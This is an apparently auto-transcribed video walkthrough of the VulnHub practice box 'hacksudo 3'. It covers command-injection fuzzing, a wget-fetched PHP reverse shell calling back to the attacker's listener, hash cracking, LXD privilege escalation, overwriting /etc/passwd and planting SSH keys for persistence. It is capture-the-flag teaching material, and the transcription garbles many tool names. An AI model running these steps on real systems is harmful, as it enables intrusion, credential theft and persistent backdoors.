Yo, what's going on, guys? In this video, we're going to be doing hacksudo 3 from VulnHub. I rate this box about a solid easy, and yeah, hope you guys enjoy. Alright, so the first thing I'm going to start by doing is we can start by opening our terminals here. Let me split these. I'll make them a little bigger, but I'll do net discover minus r 10.0.0.1/24/IET0 for my interface. So we do get the IP address of the box to 10.0.217. So I'm gonna run an mmap scan here. We'll do -SC for default scripts, -SV for enumeration, and we'll scan all ports on the IP. So I'm gonna do a banner grab. I'll do netcat -NV on port 80. We do see that port 80 is open for HTTP. The only reason I do banner grabs is so I don't have to wait for the mmap scan to be finished. So looking at this, we do get a hacksudo link lock. So I'm gonna run a go buster since there is a server running here. So I'm gonna do go buster. We'll do dir mode. -u HTTP. We'll do -w as user share word list dirbuster. We'll run a directory list 2.3 million.txt. We'll specify the extensions as HTML, TXT, and also PHP. Looking at this, we do get a login.php, info.php, and also a generator.php. So we're going to be looking at our generator.php. So look at this, we do have a generator.php. Here just shows smart people always execute a smart plan. So the first thing we're going to start by doing, this is vulnerable to code injection, or command injection. So we're actually going to be, fuzzing, right? So I believe I do have the fuzz list under my, we'll go under user share word lists. This is under fuzz. We have code injection, and we have our command exe.txt, right? So let's go under here. We can close this out. So I'm gonna go under my proxies, go to options. We're gonna go under burp sweep. We're gonna specify my address. I do have Foxy proxy on, so I'm just gonna type in hey. We can click submit. Look at this. We're going to send this to intruder since we're going to fuzz for this. We'll go to payloads, or we can go to positions, clear this. We're going to fuzz between the hey right here. We don't want to fuzz over this, so we just want to delete that. Let's go to payloads. We'll go to load. We're going to visit our / user share word list is like over here. Word list, and we'll go to fuzz, code injection, and we'll do command execute.txt. So now we do have the payload under there, so we can go to start attack. Doing this right now, we actually want to, the way we're going to filter out which one has vulnerable to code injection is actually doing is looking at the length, right? Also the bytes. We could also go to response, go to render, see what this is. Doing this, we do get a /etc password with this code injection. So looking here, we do have a user as hacksudo. We have root, of course. It seems about it. We do have LXD on here also, probably as the ID. And we have ww data here, right? Let's close that out. So let's wait for this to fuzz first. I'm really not sure why this stopped. Let's load this up again. Start attack. It shouldn't stop on 13. There we go, it keeps fuzzing. So for some reason, I don't know why this is stopping here. It's stopping at 16, so I'm gonna close this out. Let me just click OK. We'll VI into command execute. It was stopping at this right here, so we'll actually, let's see. Let's see if we can just stop this. Let's quit out of this. We'll just quit out of this. We'll open we'll open this in LavePad. We'll delete all this till, let's see. We'll delete that. We'll delete it till the ID, so we'll just delete all that. Go under there, press enter on that. So now let's load this up again. We'll go to burp, we'll go to options and so we'll go to payloads, we'll go to load this again, start attack. It does seem to load. Did I not save this file? Go to remove, clear, load, or clear, load. There we go. So now we can go to load. And we do also see a 26, the length was higher. So let's see if we can actually get some code execution. Let's go to, let's maximize this, go to results. Let's go to response, go to render. Let's render this page. Rendering this page, we do see that we have a www data. So we do have, we can execute commands with, between these little braces, right? So next thing I'm gonna do is actually put my shell on the server. So since we can execute it between this, let me actually send this to repeater. We'll X out of this. Go to proxy, we'll send this to repeater. We'll put this under there. So now I'm actually gonna VI into, we'll get a PHP reverse shell in here. Let's go under here. Let's get the raw data of this PHP reverse shell. We'll copy this. We'll go under my VulnHub. So let's go to VulnHub. We'll do mkdir for hacksudo 3. We'll cd into hacksudo 3. We'll wget this file. We'll vi into PHP reverse shell. Let's delete this first right here. So let's edit the IP. So we can go into interactive mode, 10.0.069. And we can also add the port as 4444. So we can right quit out of this. I'm actually going to start a Python server since we're going to use wget to get the shell on the server, right? So just to test for that, let's do wget. We'll use which wget. We can send this, and we do get user bin wget, right? So that means we can actually use a server to get it on the server, right? So let's make our own server on port 80. We do have that running. So let's go under here. We'll do. So we're going to do wget -o. We're going to store this under our /var www html. We'll name this shell.php. We're going to do http 10.0.069. Also, we don't need to specify the port since this is running port 80. And for the shell, this was PHP reverse shell. So let's go under here, get that shell. Let's send that. And we do get a GET request for the PHP reverse shell, right? We did name it as shell.php. So but now if we visit shell.php, we should get a connection refused. Let's go to shell.php, and we do get a connection refused, right? So now I'm a CD. We'll start a listener, netcat -lmvp on 4444. We'll press enter on that, and we do get our shell, right? So okay guys, so I actually had to cut the video out because I actually ran into some import problems. The box wasn't responding anymore, so I just re-imported the box. So we were at where we were getting a shell. So let's actually spawn a TTY shell. We'll put this in, we'll run this in bin bash, and we have Python 3. Python 3, and we are www, right? So let's export our term equals extern. So let's go into our var www html. We'll do ls-la. It doesn't seem like we do have anything under here, so let's go under var www. We do have a hacksudo here. Let's try to, this is a file, so let's cat into hacksudo. This does seem like some type of encoding. So let's go to, I think it was chef decoder. I forgot the name of it. So yeah, it was a CyberSwift army knife. So when I don't know the type of encoding, all I do is just put this in input. Go to encryption and encoding. I usually just get each type of decrypt and just put it in here and see what we get in the output. So let's do that for each decrypt. Let's go to route 13 for decrypt. And here we do get a hacksudo locker SSH username for hacksudo. So let's do ls-la for hack, or for home actually. We do get a user as hacksudo. So let's switch users to hacksudo. We don't know the password, so it does seem like we do have a hash here though, so let's copy this. Let's throw this into hash identifier, put that in there. It does seem like this is a SHA-512, so let's put this into crack station. If not, we can use the rocku.txt, right, to crack it. And use John, right? So it's traffic lights, bicycles, let's see. So go to crack hashes, and we do get a result as Vishal, right? So let's input the password Vishal, and we do get in as user hacksudo, right? So let's check our ID. Looking at our ID, we do get a LXD, right? So just to make sure that we do have LXD, we can do which LXD or LXC, and it is under snap bin LXC. And can we run this? We can run this, right? So we're going to be using, let's search up LXD for exploit DB. We're going to be using this exploit for Ubuntu 18.4. And we also need to build the Alpine. So let's go to build Alpine. Let's go to code. Let's clone this repository. So we'll git clone this. Go to LXD. Let's try to build our Alpine. It does seem like we do get an error for the mirror.txt. So let's open a leaf pad for our build Alpine. Let's see the path for this mirror. So looking at this mirror, we do see that this is going for root fs under user share Alpine mirrors.txt. So let's actually copy this. Let's go to copy. So let's actually copy that and put that under, we'll just put this under a text editor. So we do have a root fs here, so let's go to root fs. Let's go to, this was under user share, and we don't have a directory as, what was the name of the directory? Alpine mirrors. So let's copy this. We'll do mkdir for Alpine mirrors. So now for the next, it is asking us for the mirrors.txt. So let's actually copy this. Let's vi into mirrors.txt. Okay, so under here we're actually going to want to put the URL for the mirror, right? So when I ran the build out Alpine script, it did not find the mirror script or the mirror.txt. So we're gonna actually add that. So we're gonna add HTTP DL. I think it was CDN Linux. I think it's Alpine Linux. DL CDN Alpine Linux.org, I think. /Alpine. So DL CDN Alpine Linux.org. We can write quit of this. Let's cut our mirrors.txt. Seems about right. So let's try to build our Alpine now. It does seem like we don't get an error now. We do get our Alpine now for our tar.gz, so we're actually going to need to transfer this under our / well, usually for LXD, I like going under dev /shm. And we do have this now, right? So we're going to transfer our Alpine and also our exploit that we found. So let's copy this. We'll vi into LXD under exploit.sh. We'll right quit out of this. We do have our exploit, so let's run a Python server on here and use wget to transfer it onto the server. .server 80. We'll just run this on port 80. So we'll do wget http 10.0.0.69. I don't like running the commands on here, so I'm just going to run it on here. So I'm going to do wget http 10.0.0.69, and then we're going to be getting our Alpine. So let's wget that, and we're also going to be getting our LXD exploit.sh. We can run under there. So now we do have our LXD exploit.sh. So I'm actually going to chmod +x for LXD. Turn that into executable. We can run LXD exploit. It is asking us for the file name. So we can just run the file name. We can do -f for the, and then specify the tar.gc file. Running that, we can do ID, and we are root, right? So we can clear this. So the problem with this is that we don't have a persistent SSH connection. So now I actually want to create a persistent SSH connection by disabling or enabling the filtered port, right? And we can also add or use mkdir or mkpassword to generate a salt and add it under our /etc password, right? So we can go under mount root /root for the password or for the root flag. We do have our proof.txt, and we also do have our root.txt, right? So let's do alice -la. Let's go back here. Let's go under /etc alice. Let's do alice -la for password. Let's see if we have our password file under here, which we do. So let's control C out of that. We'll do mk make password. We'll do -h. It does show that we can use -m for the type of hash. So we'll do mk password -m. This is going to be SHA-512. We'll enter password. And now we do have our sol here, right? So before that happening, we actually need to make go to we'll vi into password. So let's lower this down. So we'll cat our password file. So this needs to be exact. So let's root this, or copy till root. We'll control V that into there. We'll just clear this. So we do have that. So now we actually want to go under root. Let's go into interactive mode, go under there. Okay, so we do have that copied. Let's copy this. Let's actually open this in the leaf pad. So let's quit this out. We'll open the leaf pad for password, or we'll VI into password. And now let's copy our password file into root. Copy this. Let's go into our password file. Here we do have all the users, so let's actually edit this. We're gonna do root. We'll just make one as root, and or should we make our own user? I think we should make. We'll just do it as root, right? So we'll do root. We'll get our assault, our hash here. We'll put that in there. So I think it was, let's see if I remember this. We can separate this by colon 0 colon slash root. We can run a bin. We're gonna spawn this shell as bin bash. So we do have root separated by colon 00 for the IDs. We have root bin bash. I think there's supposed to be a / there. I'm really not sure. So since we do have our password file now, let's do python 3 -m http.server on port 80. We do have, I think we do have a wget. Yeah, we do. So let's do wget -o. Let me just output this on here. It's not going to output, right? That's why. So we'll do wget -o. We'll do this under mount /root /etc. And we're going to name this password. And we're going to also output this to, we're not output it, but get it from our IP address, our server. And we do have our password, or our password file right there. So just copy that, run this under here. Now I did overwrite the password file, so let's cat our password. Looking at our password, we do have our own hash now, which is 6 or %6%, which is the same thing right here. So now let's clear this. Let's spawn a, we'll do all ravnik at -lmvp on 4444. We can just get a shell again. We'll switch users to hacksudo. This password was shell. So now let's spawn a TTY. We'll run this in bin bash, and then we'll also run this in python 3. We'll do export term is equal to xterm. Clear this. Now we can switch users to root. We did name the password as password. We do password, and we are root now, right? And we just have the ID as root. Now we do have a persistent SSH connection, right? Or not persistent, but I would say just a better shot, right? And we do have a TTY now. So we kind of go under our .ssh, but the problem with this is that we don't have the port for SSH is not open, right? So let's say that the port is filtered. So let's try to open that, right? Okay, so next we're going to be using a command called ufw. So we're going to be using ufw. We're going to do allow from 10.0.0.69 to any port 22, I think. And now you do see that it shows the rules updated. So we'll clear this. We'll run an nmap scan. So we'll do nmap scan all ports on 10.0.0.217, I think. It does show. Let's see, it still does show filtered. And you do see that port 22 for SSH is now open, right? So now let's try to SSH into that and see if it works. So let's do SSH for root at 10.0.0.127 or 217. And just ask for the password, right? So it's asking for the password because we don't have our SSH key under there. So we'll go into .ssh. Let's use Ssh Keygen. Let's open a new window here. So we'll go into .ssh. Let's do Ssh Keygen. We can cat our ID underscore rsa.pub, which is our public key. Copy this. Just copy into under here. We'll echo this into. Let's overwrite it into authorized underscore keys. Let's copy this. Let's go under here. Let's overwrite authorized keys. Let's go under authorized keys now. And it does show root at Kelly. So let's go under, let's copy the dot. Let's go into root .ssh ID underscore RSA, which is our private key to this directory. Now we do have ID underscore RSA, so let's do SSH root at 10.0.0.217. We'll do -i for ID underscore RSA. Looking at this, we do get a persistent shell now for SSH. We can do ls-la, we can tab now. And we are just under the user root, right? So we can go under root, ls, we can cat our proof.txt, and cat our root.txt, right? And it should be the nmap scan, and the port, it should still be open for you. Yeah, it should still be open. You can also do the same thing with port 21 if you want to enable FTP. But I don't think there's no reason to do that, right? So port SSH is open now. And now we do have a persistent shell. And we are root, right? Well guys, that's pretty much in the video. Remember, drop that like and subscribe button. And I'll catch you guys in the next one. Peace.